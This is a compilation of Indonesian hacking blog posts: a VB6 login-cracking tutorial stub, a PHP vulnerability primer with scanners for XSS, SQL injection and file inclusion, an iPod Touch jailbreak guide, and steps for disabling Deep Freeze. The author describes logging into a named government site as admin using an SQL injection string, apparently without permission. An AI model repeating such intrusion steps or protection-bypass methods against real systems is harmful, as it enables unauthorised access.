How to Cracking and Hacking Login Form (part-1)

How to Cracking and Hacking Login Form (part-1)


Cracking yang biasanya dikenal dengan tindakan merusak suatu sistem sehingga tidak bekerja dengan sebagaimana mestinya memiliki cabang teknik sendiri yang biasa dikenal oleh para kalangan cracker adalah teknik reversing, yaitu membalikan atau setidaknya merubah logika dan cara kerja dari sistem tersebut.
Diambil dari artikel asli tulisan kang AntiHacker dari vb-bego.com, coder pasar coba untuk mempraktekannya dan membuat pdfnya karena file Html asli diserver vb-bego sudah hilang dikarenakan berpindah hosting.
Kita akan coba membuat sample sistem aplikasi login form yang tingkat sekuritinya paling rendah, diharapkan kita semua dapat mempelajari teknik keamanan(hacking), agar aplikasi yang kita buat nantinya lebih secure, minimal menyulitkan para cracker untuk mengcrack aplikasi/system yang telah kita buat.
Untuk mempraktekan tutorial ini, ada beberapa tool yang dibutuhkan, yaitu :
UltraEdit
vbReformer
• Notepad
Aplikasi yang akan kita buat kebetulan menggunakan Microsoft visual basic 6.0.
Tak ada gading yang tak retak, begitulah pepatah tua berkata, se-secure apapun aplikasi yang kita bangun, tetap saja memiliki hole-hole yang dapat ditembus oleh para cracker, namun dengan adanya kejadian-kejadian tersebut, diharapkan para pengembang aplikasi/web tidak mengambil panas hati atau geram, karena dengan kehadiran dan tindakan para cracker justru membuat mata kita sebagai pihak pengembang terbuka, anggap saja debugger sukarela, hehehe. Toh sepengetahuan saya mereka para cracker juga biasanya ber background sebagai software/web developper yang memiliki kemampuan lebih dari pada kita.
Berikut beberapa File tutorial yang dilampirkan
Video Part 1 - Making Vulnerable Application (1,5 MB)
Video Part 2 - Cracking The Application(1,3 MB)
PDF Tutorial Asli Mengubah JNE-JE karya AntiHacker (112 KB)
Sample File Visual Basic (10 KB)

Sunday, September 28, 2008

Cek Bugs Script Php

Setelah terampungkan script php yang telah kita buat ada kalanya bug-bug yang tidak diinginkan bercokol di sela-sela script yang telah siap dionlinekan. Dan tentunya bug ini bisa berakibat fatal sehingga dapat dimanfaatkan oleh para intruder-intruder yang berusaha untuk mengekploitasi system.

Dan siapa sangka script php yang telah dibuat itu aman dari kerentanan dalam masalah security. :D~~~

Lalu, bagaimana mencegah sang hacker mengekploitasi, bahkan merusak website anda, bagaimana mencegah secara pasti dan mengetahui script yang telah dibuat memiliki bug yang fatal, bagaimana menangani itu semua ?? :D

Sebelum kita beralih maju ke langkah selanjutnya ada baiknya untuk mengenali bug popular yang paling sering diexploitasi.

Penulis akan mencoba untuk memberikan sedikit penjelasan, bug yang sering dijumpai dalam aplikasi berbasis web khususnya Content Management system maupun yang lainnya. Di antaranya :

- XSS ( Cross Site Scripting )

- SQL Injection

- RFI ( Remote File Inclusion )

Cross Site Scriping

Lebih dikenal dengan sebutan XSS. Kesalahan ini terjadi karena tidak adanya filtering pada html maupun java script.

Tetapi pada dasarnya defacing ( perubahan kontent ) hanya terjadi disisi client saja. Yang paling fatal dari bug ini adalah anda dapat mencuri cookie kemudian menggunakannya untuk berbuat sesuatu yang … :D~~

Contohnya :

Sensored [ maaf ]

SQL Injection

SQL Injection sebenarnya terjadi karena seorang attacker yang mencoba melakukan inject query sql melalui form ataupun via address bar pada browser internet. Sebagai contohnya ketika penulis mencoba login sebagai admin pada situs pemerintah Sumatra Selatan ( http://www.sumsel.go.id ). Dengan menggunakan query ‘ or 1=1– penulis pun berhasil login. Pada dasarnya ‘ atau single quote dan or 1=1– itu berfungsi untuk membingungkan si server sql, sehingga yang dilakukan oleh server sql adalah menjalankan query ” select * “. Yang terjadi adalah penulis diloloskan untuk login sebagai admin.

Berikut adalah gambar yang penulis capture ketika penulis berhasil login sebagai admin pada situs http://www.sumsel.go.id

tutorial jaringan komputer

tutorial jaringan komputer

Gambar ini diambil sebelum penulis mengontak webmaster via email untuk mempatch script phpnya.

RFI ( Remote File Inclusion )

Sebelumnya silahkan membaca artikel fungsi require, require_once, include, dan include_one RFI sendiri terjadi karena kesalahan programmer ketika melakukan coding, yakni menggunakan variable dalam fungsi-fungsi tersebut. Apabila user memasukkan url evil script miliknya pada variable yang digunakan dalam fungsi require ataupun include, yang terjadi adalah evil script tersebut dapat dieksekusi secara remote, dengan kata lain, attacker dapat menjalan command di server milik anda untuk merubah konten situs atau bahkan merusaknya. :D~~

Untuk contohnya silahkan anda cari di www.milw0rm.com :D~

Keywordnya Remote File Inclusion. :D~

Pengecekan BUG

Pengecekan bug sendiri bisa dilakukan secara manual. Hmmm … tentunya ini akan memakan banyak waktu. Terbentuklah tools yang dapat secara cepat dan otomatis menemukan bug-bug yang terselip di php script secara tidak sengaja maupun sengaja. :D~

Pada dasarnya untuk mengecek bug dapat dilakukan secara online maupun offline. Penulis sarankan pengecekan bug ini dilakukan di localhost anda ( offline ) saja.

Cek Bug XSS

Tools untuk mengecek XSS pada script php milik anda adalah sebuah addons mozilla firefox yang disediakan secara gratis. Penginstallannya pun tergolong mudah, berikut juga cara penggunaannya.

Tools tersebut dapat anda download disini :

http://www.securitycompass.com/exploit_me/xssme/xssme-0.2.1.xpi

Cek Bug SQL Injection

Untuk periode saat ini defacing dengan SQL Injection digolongkan paling favorit dan tentunya paling banyak digunakan, mungkin karena penyerangan yang dilakukan cukup mudah, cukup memiliki dasar pengetahuan syntax sql. Lagi-lagi sebuah addons mozilla firefox yang cukup ampuh dan mudah digunakan telah disediakan untuk melakukan cek bug sql injection. :D

Anda dapat mendownloadnya disini :

http://www.securitycompass.com/exploit_me/sqlime/sqlime-0.2.xpi

Penggunaanya pun tidak terlalu sulit.

Cek BUG Remote File Inclusion

Sebelumya anda download terlebih dahulu scriptnya disini http://www.newhack.org/dl_jump.php?id

Setelah itu silahkan download active perl, compiler interpreter ini nantinya digunakan untuk menjalankan script inclusionscanner.pl.

Dan kemudian copykan inclusionscanner.pl tersebut ke direktori c:\perl\bin

Langkah selanjutnya :

1. Masukkan script yang akan anda scan kedalam sebuah direktori di c:\perl php.

ex : c:\perl\wordpress.

2. Masuk ke command prompt, start | run | cmd | enter

3. Setelah itu masuk ke direktory c:\perl\bin, cd c:\perl\bin

4. Jalankan scriptnya,

C:\Perl\bin>perl.exe inclusionscanner.pl

#Will check a directory for all includes and unsets

#Coded by Ironfist (ironsecurity.nl)

#Usage: create a folder in your perlfolder and put the files to be scanned in it

, next type the folder name below (eg myfolder)

#GIVES ERRORS WHEN CHECKING SUBFOLDERS: IGNORE THEM :)

Directory to read? c:\perl\wp

kemudian lihat hasilnya di c:\perl\bin\result.html

berikut hasil scan ketika penulis mencoba untuk melakukan cek inclusion pada wordpress-2.3.3 :

FOUND: require_once($locale_file);

in c:\perl\wp/wp-settings.php FOUND: require_once($import_root . ‘/’ . $file);

in c:\perl\wp/wp-admin/import.php FOUND: include_once($this->PluginDir . “class-smtp.php”);

in c:\perl\wp/wp-includes/class-phpmailer.php FOUND: include($lang_path.’phpmailer.lang-’.$lang_type.’.php’);

in c:\perl\wp/wp-includes/class-phpmailer.php FOUND: include($lang_path.’phpmailer.lang-en.php’);

in c:\perl\wp/wp-includes/class-phpmailer.php FOUND: include($template);

in c:\perl\wp/wp-includes/template-loader.php FOUND: include($template);

in c:\perl\wp/wp-includes/template-loader.php FOUND: include($template);

in c:\perl\wp/wp-includes/template-loader.php FOUND: include($template);

in c:\perl\wp/wp-includes/template-loader.php FOUND: include($template);

in c:\perl\wp/wp-includes/template-loader.php FOUND: include($template);

in c:\perl\wp/wp-includes/template-loader.php FOUND: include($template);

in c:\perl\wp/wp-includes/template-loader.php FOUND: include($template);

in c:\perl\wp/wp-includes/template-loader.php FOUND: include($template);

in c:\perl\wp/wp-includes/template-loader.php FOUND: include($template);

in c:\perl\wp/wp-includes/template-loader.php FOUND: include($template);

in c:\perl\wp/wp-includes/template-loader.php FOUND: include($template);

in c:\perl\wp/wp-includes/template-loader.php FOUND: include($template);

in c:\perl\wp/wp-includes/template-loader.php FOUND: require_once($_template_file);

in c:\perl\wp/wp-includes/theme.php

woww !!! :D~~ silahkan di exploitasi eh di patch script milik anda. :D~~

Ingat, jangan merusak, jangan berbuat vandal, jika anda menemukan bug di situs lain seperti yang telah saya sebutkan diatas, silahkan beritahu pihak admin.

Jalur Breaking + Hacking IPOD Touch

@import url(http://www.google.com/cse/api/branding.css);

–>

Syarat:
* Tools ini cuman utk MacIntel
* Perlu koneksi WiFi + Internet (alias Hotspot)

Cara ngoprek iPod Touch:
0. Setting WiFi di iPod untuk terkoneksi dengan WiFi yang ada, dan test untuk berinternet dulu.
1. Download iJailbreak dari http://ijailbreak.googlecode.com/files/iJailBreak0.3fixed.zip
2. Extract hasil download
3. Copy isi direktori (isinya lho ya iJailbreak.app dan resources) ke folder /Applications
4. Rename Harddisk utama kamu menjadi “Macintosh HD”
5. Colokan iPod ke Mac … dan matikan iTunes
6. Jalankan iJailbreak dari /Applications …. dan ikuti petunjuk dari aplikasi tersebut.
7. Saat ada tulisan Jailbreaking …. tunggu sekitar 5-10 menit … kl muncul pesan2 error sebelum ada pesan sukses, mending cek ulang proses di atas sekali lagi, dan ulangi aja lagi.
8. Saat proses sukses …. perlu diingat password root nya adalah “alpine” bukan “dottie” seperti di iPhone ;))
9. Nah seharusnya skrg … iPod kamu udah ada aplikasi2 dari iPhone … seperti Mail, Stock, Weather. Tp Calendar belum bisa mode “Edit”.
10. Dari Terminal:
scp root@IP_ipod:/System/Library/CoreServices/SpringBoard.app/N45AP.plist .
plutil -convert xml1 N45AP.plist
vi N45AP.plist

Tambahkan baris berikut:

<>editableUserData< / key >
<>

dibawah baris

<>capabilities< / key >
<>
< /dict >

* Hapus spasi di antara karakter yang ada

Lalu konvert kembali ke binary:

plutil -convert binary1 N45AP.plist
scp N45AP.plist root@IP_ipod:/System/Library/CoreServices/SpringBoard.app/

Lalu kill proses springboard di iPod, dengan ssh ke sana … trus “ps auxwww” … cari PID springboard … kill [PID].

Lalu test aja deh ;))

Berbagai cara Melumpuhkan Deep Freeze

Deep Freeze memang aplikasi “aneh bin ajaib”. Aplikasi ini bisa “membekukan” harddisk sehingga perubahan-perubahan yang terjadi pada system akan lenyap saat komputer di restart. Namun, saat kita mencoba mengUninstallnya, seringkali kita mengalami kesulitan. Belum lagi kalau kita lupa passwordnya.

Di bawah ini akan saya coba ulas berbagai tips untuk menghabisi Deep Freeze yang saya kumpulkan dari beberapa sumber. Semoga bisa membantu anda.

============Pake xDeepFreeze=============
1. Download xDeepFreeze di sini.
2. ekstrak ke C:\xDeepFreeze
3. Jalankan file Run_Me.exe. Muncul file “mcr.bat” dan “XDeepFreeze.exe” akan terload.
4. Pada XDeepFreeze, Tekan “Stop DeepFreeze”, untuk menghentikan “frzstate.exe”
5. Bersihkan registry yang dibuat Deep Freeze saat instalasi, tekan “Clean Registry”.
6. Jalankan command.com di folder C:\xDeepFreeze
7. Jalankan mcr.bat. Ini akan membersihkan file “persifrz.vxd”.
8. Klik Exit. Deep Freeze tinggal sejarah.

============Pake Deep Unfreezer (Deep Freeze dibawah v.6)=============
1. Download Deep Unfreezer di sini.
2. Jalankan aplikasi. Klik Load Status.
3. Pilih Boot Thawed. Klik Save Status.
4. Reboot

============Pake PE Builder (Live CD Windows)=============
Cara yang satu ini saya kutip dari Wikianswer. Aplikasi yag harus disiapkan adalah PE Builder. Anda bisa mendapatkannya di sini. Selain itu, anda membutuhkan file instalasi Windows (XP Home/ Pro dengan minimal SP 1 atau Server 2003).
Langkah-langkah yang harus dilakukan cukup panjang. Pertama-tama, kita harus membuat CD Startup Windows.
1. Pastikan sistem memiliki ruang kosong 500 MB.
2. Copy file instalasi Windows ke folder khusus di Harddisk.
3. Install PE Builder, lalu jalankan aplikasi ini.
4. Setelah menyetujui License Agreement, akan muncul tampilan utama PE Builder.
5. Masukkan lokasi file instalasi Windows.
6.Pada dialog PE Builder, pilih opsi “Burn CD/DVD”. Ketika anda menggunakan CD RW (bisa dihapus), pastikan bahwa pilihan “AutoErase RW” diaktifkan. Pilihan “burn using” harus diset ke “StarBurn”. Kalau anda ingin CD otomatis dikeluarkan setelah proses burning selesai, centangi “Eject after burn”. Pilih cd writer anda dari daftar device.
7. klik “build”. PE builder akan meminta ijin membuat direktori BartPE, jawab Yes.
8. Lisensi dari Microsoft Windows tampil. Baca dan pilih agree untuk melanjutkan.
9. Tunggu sampai selesai.
Langkah selajutnya, silakan retart komputer dan masuk ke BIOS. Ubah urutan booting agar boot melalui CD. Setelah masuk ke live CD Windows, lakukan langkah-berikut.
1. Jalankan regedit.
2. Buka menu Find dan masukkan “UpperFilters”. Jangan lupa centangi “only the Values”.
3. Jika telah ditemukan, lihat apakah terdapat baris yang mencantumkan driver Deep Freeze (DeepFrz atau DepFrzLo) lalu hapus. hapis juga baris untuk ThawSpace

(ThwSpace), biarkan sisanya. Tekan F3 untuk melanjutkan pencarian dan ulangi proses diatas sampai value UpperFilters tidak ada di key HKLM\MySystem.
4. Tuju ke HKLM\MySystem\Select lalu buka value bernama Default. Di sini terdapat key untuk control set yang akan digunakan system saat booting. Jika nilainya 1 maka akan tertulis ControlSet001, jika 2 akan tertulis ControlSet002, dst. Ingat control set itu
5. Lalu tuju ke HKLM\MySystem\ControlSetXXX(sesuai default)\Services lalu hapis key yang bernama driver Deep Freeze (DeepFrz atau DepFrzLo dan DepFrzHi). Lalu hapus juga driver ThawSpace (ThwSpace).
6. Reboot system secara normal.
7. Selesai sudah.
Bila ada langkah-langkah yang kurang jelas, silakan periksa referensi.